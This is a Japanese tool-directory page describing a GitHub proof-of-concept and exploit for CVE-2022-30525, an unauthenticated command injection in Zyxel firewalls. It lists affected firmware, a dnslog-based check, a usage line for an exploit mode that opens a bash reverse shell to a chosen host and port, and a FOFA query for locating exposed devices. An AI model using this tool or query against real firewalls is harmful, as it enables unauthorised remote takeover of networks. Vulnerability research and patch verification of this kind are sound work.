Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-30525 — CVE-2022-30525 Zyxel ファイアウォールのコマンドインジェクション脆弱性 POC&EXPC | Kitploit
ツール/GitHubGitHub/west9b/cve-2022-30525
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubwest9b/cve-2022-30525

CVE-2022-30525

CVE-2022-30525 Zyxel ファイアウォールのコマンドインジェクション脆弱性 POC&EXPC

リポジトリを見る
123114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-30525 Zyxel ファイアウォールコマンドインジェクションの脆弱性

CVE-2022-30525 POC&EXP

author:160team.west9B

認可を受けたセキュリティ研究者のみが使用できます。サイバーセキュリティ法を遵守してください。発生したいかなる問題についても、その結果はすべて自己責任であり、作者とは無関係です。

01-基本紹介

2022年5月12日、Zyxelはセキュリティアドバイザリを公開し、ファイアウォールデバイスにおける認証されていないリモートコマンドインジェクションの脆弱性(CVE-2022-30525)を修正しました。この脆弱性のCVSSスコアは9.8です。この脆弱性は一部のZyxelファイアウォールバージョンのCGIプログラムに存在し、認証なしで影響を受けるデバイス上で任意のコマンドを実行できます。

影響範囲:

ATPシリーズファームウェア:5.10-5.21 Patch 1

VPNシリーズファームウェア:4.60-5.21 Patch 1

USG FLEX 100(W)、200、500、700:5.00-5.21 Patch 1

USG FLEX 50(W)/USG20(W)-VPN:5.10-5.21 Patch 1

02-使用方法

usage_poc: ./cve-2022-30525 -m poc -u url

usage_exp: ./cve-2022-30525 -m exp -u url -lhost ip -lport port

1. POC

この脆弱性はコマンド実行の出力が返らないため、POCはdnslog APIへのリクエストで検証します。dnslogにリクエストがあれば脆弱性が存在します。ネットワーク遅延による誤検知を防ぐため、DNSLOG検証リクエストは10秒遅延させます。

usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/

2. exp

expはbashリバースシェルです。-m exp の後にVPSのIPアドレスとポートを指定します。

**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

Screenshots

Image text Image text

refer

https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

fofa

title="USG FLEX xx"

ツールをダウンロード